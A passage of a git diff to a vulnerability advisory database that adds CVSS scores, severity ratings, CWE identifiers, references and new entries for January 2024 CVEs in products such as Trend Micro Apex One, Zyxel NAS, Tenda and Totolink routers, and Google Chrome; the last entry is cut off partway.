+ } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T12:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hcpx-fjcv-rp6j/GHSA-hcpx-fjcv-rp6j.json b/advisories/unreviewed/2024/01/GHSA-hcpx-fjcv-rp6j/GHSA-hcpx-fjcv-rp6j.json index 5516d23915722..70353e104d822 100644 --- a/advisories/unreviewed/2024/01/GHSA-hcpx-fjcv-rp6j/GHSA-hcpx-fjcv-rp6j.json +++ b/advisories/unreviewed/2024/01/GHSA-hcpx-fjcv-rp6j/GHSA-hcpx-fjcv-rp6j.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hcpx-fjcv-rp6j", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52093" ], "details": "An exposed dangerous function vulnerability in the Trend Micro Apex One agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hf79-3hfm-mgmr/GHSA-hf79-3hfm-mgmr.json b/advisories/unreviewed/2024/01/GHSA-hf79-3hfm-mgmr/GHSA-hf79-3hfm-mgmr.json index d0563b98c8a99..fde8dbc5a56a0 100644 --- a/advisories/unreviewed/2024/01/GHSA-hf79-3hfm-mgmr/GHSA-hf79-3hfm-mgmr.json +++ b/advisories/unreviewed/2024/01/GHSA-hf79-3hfm-mgmr/GHSA-hf79-3hfm-mgmr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hf79-3hfm-mgmr", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-46892" ], "details": "The radio frequency communication protocol being used by Meross MSH30Q 4.5.23 is vulnerable to replay attacks, allowing attackers to record and replay previously captured communication to execute unauthorized commands or actions (e.g., thermostat's temperature).", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-294" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hgqh-qj43-xfmf/GHSA-hgqh-qj43-xfmf.json b/advisories/unreviewed/2024/01/GHSA-hgqh-qj43-xfmf/GHSA-hgqh-qj43-xfmf.json new file mode 100644 index 0000000000000..fbb2d78a597af --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hgqh-qj43-xfmf/GHSA-hgqh-qj43-xfmf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hgqh-qj43-xfmf", + "modified": "2024-01-31T12:30:17Z", + "published": "2024-01-31T12:30:17Z", + "aliases": [ + "CVE-2023-50356" + ], + "details": "SSL connections to NOVELL and Synology LDAP server are vulnerable to a man-in-the-middle attack due to improper certificate validation in AREAL Topkapi Vision (Server). This allows a remote unauthenticated attacker to gather sensitive information and prevent valid users from login.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50356" + }, + { + "type": "WEB", + "url": "https://www.areal-topkapi.com/en/services/security-bulletins" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T11:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hgrc-r3ff-wxfq/GHSA-hgrc-r3ff-wxfq.json b/advisories/unreviewed/2024/01/GHSA-hgrc-r3ff-wxfq/GHSA-hgrc-r3ff-wxfq.json index dbabc79ff35a1..d25077743f99c 100644 --- a/advisories/unreviewed/2024/01/GHSA-hgrc-r3ff-wxfq/GHSA-hgrc-r3ff-wxfq.json +++ b/advisories/unreviewed/2024/01/GHSA-hgrc-r3ff-wxfq/GHSA-hgrc-r3ff-wxfq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hgrc-r3ff-wxfq", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-36177" ], "details": "An issue was discovered in badaix Snapcast version 0.27.0, allows remote attackers to execute arbitrary code and gain sensitive information via crafted request in JSON-RPC-API.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hgw6-wf28-c5x3/GHSA-hgw6-wf28-c5x3.json b/advisories/unreviewed/2024/01/GHSA-hgw6-wf28-c5x3/GHSA-hgw6-wf28-c5x3.json new file mode 100644 index 0000000000000..6347170711b8f --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hgw6-wf28-c5x3/GHSA-hgw6-wf28-c5x3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hgw6-wf28-c5x3", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-5372" + ], + "details": "The post-authentication command injection vulnerability in Zyxel NAS326 firmware versions through V5.21(AAZF.15)C0 and NAS542 firmware versions through V5.21(ABAG.12)C0 could allow an authenticated attacker with administrator privileges to execute some operating system (OS) commands by sending a crafted query parameter attached to the URL of an affected device’s web management interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5372" + }, + { + "type": "WEB", + "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-vulnerability-in-nas-products-01-30-2024" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hgx4-v6hr-x7qw/GHSA-hgx4-v6hr-x7qw.json b/advisories/unreviewed/2024/01/GHSA-hgx4-v6hr-x7qw/GHSA-hgx4-v6hr-x7qw.json new file mode 100644 index 0000000000000..6d172e1e98f63 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hgx4-v6hr-x7qw/GHSA-hgx4-v6hr-x7qw.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hgx4-v6hr-x7qw", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0989" + ], + "details": "A vulnerability, which was classified as problematic, has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this issue is the function del_sn_db of the file /application/index/controller/Service.php. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-252254 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0989" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/XKxaJTphW6PB" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252254" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252254" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22", + "CWE-24" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T01:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hj6r-9q35-32hf/GHSA-hj6r-9q35-32hf.json b/advisories/unreviewed/2024/01/GHSA-hj6r-9q35-32hf/GHSA-hj6r-9q35-32hf.json new file mode 100644 index 0000000000000..a69492c735b3f --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hj6r-9q35-32hf/GHSA-hj6r-9q35-32hf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hj6r-9q35-32hf", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2024-22647" + ], + "details": "An user enumeration vulnerability was found in SEO Panel 4.10.0. This issue occurs during user authentication, where a difference in error messages could allow an attacker to determine if a username is valid or not, enabling a brute-force attack with valid usernames.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22647" + }, + { + "type": "WEB", + "url": "https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22647" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hjh6-9v4w-w32w/GHSA-hjh6-9v4w-w32w.json b/advisories/unreviewed/2024/01/GHSA-hjh6-9v4w-w32w/GHSA-hjh6-9v4w-w32w.json index 332ac053c69b8..54fe9959c3791 100644 --- a/advisories/unreviewed/2024/01/GHSA-hjh6-9v4w-w32w/GHSA-hjh6-9v4w-w32w.json +++ b/advisories/unreviewed/2024/01/GHSA-hjh6-9v4w-w32w/GHSA-hjh6-9v4w-w32w.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20926" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0002/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-hjm7-v5pw-x89r/GHSA-hjm7-v5pw-x89r.json b/advisories/unreviewed/2024/01/GHSA-hjm7-v5pw-x89r/GHSA-hjm7-v5pw-x89r.json index 2c57391442e4e..6ca663ddcb665 100644 --- a/advisories/unreviewed/2024/01/GHSA-hjm7-v5pw-x89r/GHSA-hjm7-v5pw-x89r.json +++ b/advisories/unreviewed/2024/01/GHSA-hjm7-v5pw-x89r/GHSA-hjm7-v5pw-x89r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hjm7-v5pw-x89r", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0807" ], "details": "Use after free in Web Audio in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hm4h-jq5c-c933/GHSA-hm4h-jq5c-c933.json b/advisories/unreviewed/2024/01/GHSA-hm4h-jq5c-c933/GHSA-hm4h-jq5c-c933.json index 335693358a7e6..6bee6e0ccffb9 100644 --- a/advisories/unreviewed/2024/01/GHSA-hm4h-jq5c-c933/GHSA-hm4h-jq5c-c933.json +++ b/advisories/unreviewed/2024/01/GHSA-hm4h-jq5c-c933/GHSA-hm4h-jq5c-c933.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hm4h-jq5c-c933", - "modified": "2024-01-23T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T09:30:22Z", "aliases": [ "CVE-2024-23851" ], "details": "copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel->data_size check. This is related to ctl_ioctl.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T09:15:36Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hpcp-jfj7-rjww/GHSA-hpcp-jfj7-rjww.json b/advisories/unreviewed/2024/01/GHSA-hpcp-jfj7-rjww/GHSA-hpcp-jfj7-rjww.json new file mode 100644 index 0000000000000..6ded70bfaf2b9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hpcp-jfj7-rjww/GHSA-hpcp-jfj7-rjww.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hpcp-jfj7-rjww", + "modified": "2024-02-05T18:31:36Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-5124" + ], + "details": "The Page Builder: Pagelayer WordPress plugin before 1.8.0 doesn't prevent attackers with administrator privileges from inserting malicious JavaScript inside a post's header or footer code, even when unfiltered_html is disallowed, such as in multi-site WordPress configurations.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5124" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/1ef86546-3467-432c-a863-1ca3e5c65bd4/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hr3c-fw3g-qvhf/GHSA-hr3c-fw3g-qvhf.json b/advisories/unreviewed/2024/01/GHSA-hr3c-fw3g-qvhf/GHSA-hr3c-fw3g-qvhf.json index 24dd329cb4182..423070a464082 100644 --- a/advisories/unreviewed/2024/01/GHSA-hr3c-fw3g-qvhf/GHSA-hr3c-fw3g-qvhf.json +++ b/advisories/unreviewed/2024/01/GHSA-hr3c-fw3g-qvhf/GHSA-hr3c-fw3g-qvhf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hr3c-fw3g-qvhf", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-46889" ], "details": "Meross MSH30Q 4.5.23 is vulnerable to Cleartext Transmission of Sensitive Information. During the device setup phase, the MSH30Q creates an unprotected Wi-Fi access point. In this phase, MSH30Q needs to connect to the Internet through a Wi-Fi router. This is why MSH30Q asks for the Wi-Fi network name (SSID) and the Wi-Fi network password. When the user enters the password, the transmission of the Wi-Fi password and name between the MSH30Q and mobile application is observed in the Wi-Fi network. Although the Wi-Fi password is encrypted, a part of the decryption algorithm is public so we complemented the missing parts to decrypt it.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-319" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T20:15:45Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hr8f-72r6-vq27/GHSA-hr8f-72r6-vq27.json b/advisories/unreviewed/2024/01/GHSA-hr8f-72r6-vq27/GHSA-hr8f-72r6-vq27.json index beb246ebd43ed..e1b8369ad1242 100644 --- a/advisories/unreviewed/2024/01/GHSA-hr8f-72r6-vq27/GHSA-hr8f-72r6-vq27.json +++ b/advisories/unreviewed/2024/01/GHSA-hr8f-72r6-vq27/GHSA-hr8f-72r6-vq27.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hr8f-72r6-vq27", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2024-23183" ], "details": "Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute an arbitrary script on the logged-in user's web browser.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T10:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hwg5-mfhv-33w6/GHSA-hwg5-mfhv-33w6.json b/advisories/unreviewed/2024/01/GHSA-hwg5-mfhv-33w6/GHSA-hwg5-mfhv-33w6.json index 40030fa999963..3ecec4d50bf0d 100644 --- a/advisories/unreviewed/2024/01/GHSA-hwg5-mfhv-33w6/GHSA-hwg5-mfhv-33w6.json +++ b/advisories/unreviewed/2024/01/GHSA-hwg5-mfhv-33w6/GHSA-hwg5-mfhv-33w6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hwg5-mfhv-33w6", - "modified": "2024-01-25T18:30:51Z", + "modified": "2024-01-31T18:31:24Z", "published": "2024-01-25T18:30:51Z", "aliases": [ "CVE-2024-22749" ], "details": "GPAC v2.3 was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T16:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hx7j-w75q-79h5/GHSA-hx7j-w75q-79h5.json b/advisories/unreviewed/2024/01/GHSA-hx7j-w75q-79h5/GHSA-hx7j-w75q-79h5.json index bb9914e775525..e3d497fde4bb5 100644 --- a/advisories/unreviewed/2024/01/GHSA-hx7j-w75q-79h5/GHSA-hx7j-w75q-79h5.json +++ b/advisories/unreviewed/2024/01/GHSA-hx7j-w75q-79h5/GHSA-hx7j-w75q-79h5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hx7j-w75q-79h5", - "modified": "2024-01-25T06:30:31Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T06:30:31Z", "aliases": [ "CVE-2023-50785" ], "details": "Zoho ManageEngine ADAudit Plus before 7270 allows admin users to view names of arbitrary directories via path traversal.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-22" ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T06:15:50Z" diff --git a/advisories/unreviewed/2024/01/GHSA-j2p7-j8v8-q5g2/GHSA-j2p7-j8v8-q5g2.json b/advisories/unreviewed/2024/01/GHSA-j2p7-j8v8-q5g2/GHSA-j2p7-j8v8-q5g2.json index 2630d364f1dfa..35a82159218be 100644 --- a/advisories/unreviewed/2024/01/GHSA-j2p7-j8v8-q5g2/GHSA-j2p7-j8v8-q5g2.json +++ b/advisories/unreviewed/2024/01/GHSA-j2p7-j8v8-q5g2/GHSA-j2p7-j8v8-q5g2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j2p7-j8v8-q5g2", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2024-22725" ], "details": "Orthanc versions before 1.12.2 are affected by a reflected cross-site scripting (XSS) vulnerability. The vulnerability was present in the server's error reporting.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T16:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-j2wh-3mg8-x62m/GHSA-j2wh-3mg8-x62m.json b/advisories/unreviewed/2024/01/GHSA-j2wh-3mg8-x62m/GHSA-j2wh-3mg8-x62m.json index 31b42aa545e3e..1875c249a4b52 100644 --- a/advisories/unreviewed/2024/01/GHSA-j2wh-3mg8-x62m/GHSA-j2wh-3mg8-x62m.json +++ b/advisories/unreviewed/2024/01/GHSA-j2wh-3mg8-x62m/GHSA-j2wh-3mg8-x62m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j2wh-3mg8-x62m", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:20Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47198" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47199.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-j3rg-72x7-gm5r/GHSA-j3rg-72x7-gm5r.json b/advisories/unreviewed/2024/01/GHSA-j3rg-72x7-gm5r/GHSA-j3rg-72x7-gm5r.json new file mode 100644 index 0000000000000..4952564556098 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-j3rg-72x7-gm5r/GHSA-j3rg-72x7-gm5r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j3rg-72x7-gm5r", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2023-37518" + ], + "details": "HCL BigFix ServiceNow is vulnerable to arbitrary code injection. A malicious authorized attacker could inject arbitrary code and execute within the context of the running user.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37518" + }, + { + "type": "WEB", + "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110202" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T16:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-j48h-6x68-4fc5/GHSA-j48h-6x68-4fc5.json b/advisories/unreviewed/2024/01/GHSA-j48h-6x68-4fc5/GHSA-j48h-6x68-4fc5.json index 6c380a9f18b2a..bbb5192035362 100644 --- a/advisories/unreviewed/2024/01/GHSA-j48h-6x68-4fc5/GHSA-j48h-6x68-4fc5.json +++ b/advisories/unreviewed/2024/01/GHSA-j48h-6x68-4fc5/GHSA-j48h-6x68-4fc5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j48h-6x68-4fc5", - "modified": "2024-01-24T03:31:25Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-24T03:31:25Z", "aliases": [ "CVE-2024-21765" ], "details": "Electronic Delivery Check System (Doboku) Ver.18.1.0 and earlier, Electronic Delivery Check System (Dentsu) Ver.12.1.0 and earlier, Electronic Delivery Check System (Kikai) Ver.10.1.0 and earlier, and Electronic delivery item Inspection Support SystemVer.4.0.31 and earlier improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-611" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T02:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-j8ch-gmcj-9qgp/GHSA-j8ch-gmcj-9qgp.json b/advisories/unreviewed/2024/01/GHSA-j8ch-gmcj-9qgp/GHSA-j8ch-gmcj-9qgp.json new file mode 100644 index 0000000000000..de4dd8f6d2c0d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-j8ch-gmcj-9qgp/GHSA-j8ch-gmcj-9qgp.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j8ch-gmcj-9qgp", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0991" + ], + "details": "A vulnerability has been found in Tenda i6 1.0.0.9(3857) and classified as critical. This vulnerability affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252256. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0991" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-9c9952ba7216422c8188e75c94bb531a?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252256" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252256" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-j8jv-qh5w-hrq5/GHSA-j8jv-qh5w-hrq5.json b/advisories/unreviewed/2024/01/GHSA-j8jv-qh5w-hrq5/GHSA-j8jv-qh5w-hrq5.json new file mode 100644 index 0000000000000..01081033b8d5e --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-j8jv-qh5w-hrq5/GHSA-j8jv-qh5w-hrq5.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j8jv-qh5w-hrq5", + "modified": "2024-01-29T15:30:29Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2024-1002" + ], + "details": "A vulnerability classified as critical was found in Totolink N200RE 9.3.5u.6139_B20201216. Affected by this vulnerability is the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ePort leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252271. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ 